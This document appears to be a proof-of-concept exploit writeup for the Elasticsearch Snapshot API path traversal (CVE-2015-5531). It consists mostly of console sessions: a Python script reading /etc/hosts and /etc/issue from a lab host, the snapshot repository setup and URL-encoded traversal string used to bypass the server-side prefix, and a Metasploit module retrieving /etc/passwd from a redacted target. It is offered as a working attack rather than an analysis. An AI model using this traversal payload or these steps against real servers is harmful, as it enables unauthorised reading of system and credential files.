Script for ElasticSearch url path traversal vuln. CVE-2015-5531
[crg@fogheaven elasticpwn]$ python CVE-2015-5531.py exploitlab.int /etc/hosts
!dSR script for CVE-2015-5531
127.0.0.1 localhost
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
The script requires path.repo to be set into elasticsearch.yml and be writeable by elasticsearch process.
In order to bypass the snapshot- prefix setted in the server side, we need to create a known relative path:
curl http://exploitlab.int:9200/_snapshot/?pretty
{
"pwn" : {
"type" : "fs",
"settings" : {
"location" : "dsr"
}
},
"pwnie" : {
"type" : "fs",
"settings" : {
"location" : "dsr/snapshot-ev1l"
}
}
}
We will use it later to access through path traversal url:
trav = 'ev1l%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
The file content it's represented as an array of ints, that needs to be translated into human readable:
crg@exploitlab:~$ python elk-5531.py localhost /etc/issue
!dSR script for CVE-2015-5531
{u'status': 400, u'error': u'ElasticsearchParseException[Failed to derive xcontent from (offset=0, length=26): [85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, 92, 110, 32, 92, 108, 10, 10]]'}
[85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, 92, 110, 32, 92, 108, 10, 10] = Ubuntu 12.04.5 LTS \n \l
There is also a path disclosure that could help exploiting in some scenarios:
crg@exploitlab:~$ python elk-5531.py localhost /etc/passwda
!dSR script for CVE-2015-5531
{"error":"SnapshotMissingException[[pwn:dsr/../../../../../../../../etc/passwda] is missing]; nested: FileNotFoundException[/var/tmp/dsr/snapshot-dsr/../../../../../../../../etc/passwda (No such file or directory)]; ","status":404}
msf > use auxiliary/scanner/http/elasticsearch_traversal
msf auxiliary(elasticsearch_traversal) > show options
Module options (auxiliary/scanner/http/elasticsearch_traversal):
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 7 yes Traversal depth
FILEPATH /etc/passwd yes The path to the file to read
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 9200 yes The target port
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
msf auxiliary(elasticsearch_traversal) > info
Name: ElasticSearch Snapshot API Directory Traversal
Module: auxiliary/scanner/http/elasticsearch_traversal
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Benjamin Smith
Pedro Andujar <[email protected]>
Jose A. Guasch <[email protected]>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 7 yes Traversal depth
FILEPATH /etc/passwd yes The path to the file to read
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 9200 yes The target port
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
Description:
'This module exploits a directory traversal vulnerability in
ElasticSearch, allowing an attacker to read arbitrary files with JVM
process privileges, through the Snapshot API. '
References:
http://cvedetails.com/cve/2015-5531/
https://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html
msf auxiliary(elasticsearch_traversal) > set RHOSTS **********
RHOSTS => **********
msf auxiliary(elasticsearch_traversal) > run
[*] **********:9200 - Checking if it's a vulnerable ElasticSearch
[+] **********:9200 - Check successful
[*] **********:9200 - Retrieving file contents...
[+] **********:9200 - File saved in: /home/msfdev/.msf4/loot/20151013131441_default_**********_elasticsearch.tr_809992.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(elasticsearch_traversal) > cat /home/msfdev/.msf4/loot/20151013131441_default_**********_elasticsearch.tr_809992.txt
[*] exec: cat /home/msfdev/.msf4/loot/20151013131441_default_**********_elasticsearch.tr_809992.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
elasticsearch:x:107:113::/home/elasticsearch:/bin/false
msf auxiliary(elasticsearch_traversal) >